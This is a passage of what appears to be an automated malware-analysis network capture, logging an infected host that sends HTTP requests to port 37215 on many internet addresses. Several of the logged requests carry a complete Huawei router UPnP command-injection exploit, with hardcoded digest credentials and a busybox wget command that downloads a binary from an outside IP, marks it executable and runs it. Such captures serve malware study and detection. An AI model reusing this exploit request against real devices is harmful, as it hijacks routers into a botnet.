2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2526192.168.2.153368041.177.48.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818969965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2527192.168.2.156005041.65.163.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.819000959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2528192.168.2.154749241.126.24.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2529192.168.2.155622241.211.20.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2530192.168.2.155510041.216.198.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2531192.168.2.155347841.115.125.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2532192.168.2.155116041.3.196.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2533192.168.2.155398641.69.69.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2534192.168.2.155763841.236.195.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2535192.168.2.154379241.107.44.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2536192.168.2.154595241.223.0.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2537192.168.2.154446041.10.207.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2538192.168.2.153947841.141.185.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2539192.168.2.154481441.245.189.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2540192.168.2.154773241.214.67.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2541192.168.2.153559041.176.60.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2542192.168.2.154425241.107.39.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2543192.168.2.155320241.202.150.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2544192.168.2.154943041.199.211.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2545192.168.2.154799041.226.90.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2546192.168.2.154510041.80.177.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2547192.168.2.155063641.21.177.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2548192.168.2.155581441.216.155.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2549192.168.2.153810441.19.194.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2550192.168.2.155699441.78.36.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2551192.168.2.155250841.180.112.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2552192.168.2.155916241.196.148.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2553192.168.2.154502041.26.17.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2554192.168.2.155978841.70.115.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2555192.168.2.155452041.51.143.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2556192.168.2.155733241.130.171.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2557192.168.2.154233241.3.116.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2558192.168.2.154683841.124.45.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2559192.168.2.155259041.43.174.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2560192.168.2.154192041.78.15.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2561192.168.2.153455441.184.174.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2562192.168.2.153392641.146.106.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2563192.168.2.154447041.130.198.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2564192.168.2.154198041.24.0.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2565192.168.2.153694041.117.204.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2566192.168.2.155683641.18.160.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2567192.168.2.154341641.112.193.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2568192.168.2.1533724156.8.233.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2569192.168.2.1556666156.238.32.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2570192.168.2.1541992156.112.135.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2571192.168.2.1545094156.46.177.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2572192.168.2.1551274156.131.245.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2573192.168.2.1542768156.216.75.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2574192.168.2.1554254156.110.183.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2575192.168.2.1554516156.23.56.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2576192.168.2.1542308156.65.125.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2577192.168.2.1545832156.129.53.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2578192.168.2.1547912156.238.59.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2579192.168.2.1555518156.54.53.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2580192.168.2.1544964156.177.199.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2581192.168.2.1544844156.167.176.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2582192.168.2.1557510156.250.38.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2583192.168.2.1549362156.176.19.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2584192.168.2.1539146156.46.93.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2585192.168.2.1547442156.189.185.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2586192.168.2.1539168156.114.18.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2587192.168.2.1548748156.249.10.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2588192.168.2.1550356156.79.191.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2589192.168.2.1553440156.27.226.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2590192.168.2.1558994156.179.140.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2591192.168.2.1544046156.50.120.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2592192.168.2.1553334156.115.71.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2593192.168.2.1556000156.151.214.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2594192.168.2.1542954156.15.195.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2595192.168.2.1535594156.42.189.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2596192.168.2.1549188156.173.111.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2597192.168.2.1552270156.135.187.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2598192.168.2.1534956156.149.199.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2599192.168.2.1547994156.134.78.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2600192.168.2.1544872156.173.3.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2601192.168.2.1537126156.39.203.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2602192.168.2.1533316156.122.8.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2603192.168.2.1534106156.13.46.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2604192.168.2.1533786156.114.179.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2605192.168.2.1549190156.111.55.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2606192.168.2.1544958156.214.60.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2607192.168.2.1537196156.2.106.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2608192.168.2.1534392156.91.133.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2609192.168.2.1551814156.42.89.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2610192.168.2.1548562156.89.180.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2611192.168.2.1539624156.22.107.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2612192.168.2.1540586156.130.79.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2613192.168.2.1534840156.176.68.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2614192.168.2.1556444156.235.78.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2615192.168.2.1544378156.50.234.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2616192.168.2.1552346156.51.130.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2617192.168.2.1551862156.183.197.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2618192.168.2.1545546156.1.115.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2619192.168.2.1549478156.211.34.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2620192.168.2.1551660156.43.238.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2621192.168.2.1546084156.154.62.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2622192.168.2.1539760156.230.177.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2623192.168.2.1538498156.137.230.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2624192.168.2.1537412156.200.129.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2625192.168.2.1560648156.143.164.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2626192.168.2.1560776156.147.42.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2627192.168.2.1547572156.84.87.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2628192.168.2.1543890156.41.225.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2629192.168.2.1547794156.245.249.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2630192.168.2.1558282156.87.87.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2631192.168.2.1534286156.41.224.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2632192.168.2.1534898156.215.203.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2633192.168.2.1552896156.108.43.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2634192.168.2.1548832156.113.78.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2635192.168.2.1546716156.114.114.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2636192.168.2.1537246156.149.106.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2637192.168.2.1551694156.152.125.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2638192.168.2.1542754156.88.32.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2639192.168.2.1546090156.204.35.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2640192.168.2.1552012156.212.179.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2641192.168.2.1551468156.19.51.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2642192.168.2.1542962156.79.202.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2643192.168.2.1555482156.99.189.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2644192.168.2.1546638156.228.245.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2645192.168.2.1551656156.235.51.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2646192.168.2.1535450156.28.179.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2647192.168.2.1550284156.166.225.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2648192.168.2.1533394156.43.211.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2649192.168.2.1542412156.152.60.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2650192.168.2.1536562156.26.193.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2651192.168.2.1537664156.185.188.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2652192.168.2.1557054156.171.49.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2653192.168.2.1533284156.97.92.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2654192.168.2.1536548156.186.158.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2655192.168.2.1535408156.141.210.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2656192.168.2.1539096156.50.219.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2657192.168.2.1541802156.200.97.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2658192.168.2.1537082156.18.254.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2659192.168.2.1542868156.142.13.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2660192.168.2.1544900156.44.246.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2661192.168.2.1557540156.132.83.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2662192.168.2.1544170156.42.183.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2663192.168.2.1533336156.132.206.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2664192.168.2.1533088156.79.189.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2665192.168.2.1539474156.83.127.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2666192.168.2.1550440156.64.126.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2667192.168.2.1546630156.181.194.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2668192.168.2.1555742156.13.186.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2669192.168.2.1549724156.230.232.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2670192.168.2.1536764156.64.143.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2671192.168.2.1542614156.66.238.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2672192.168.2.1535390156.231.189.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2673192.168.2.1541168156.214.168.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2674192.168.2.1556926156.47.226.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2675192.168.2.1548140156.137.242.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2676192.168.2.1557798156.158.229.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2677192.168.2.1541572156.70.34.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2678192.168.2.1535536156.200.69.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2679192.168.2.1552032156.205.58.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2680192.168.2.1537304156.4.45.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2681192.168.2.1538316156.70.255.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2682192.168.2.1539594156.58.57.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2683192.168.2.1548026156.51.126.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2684192.168.2.1554862156.244.11.12637215
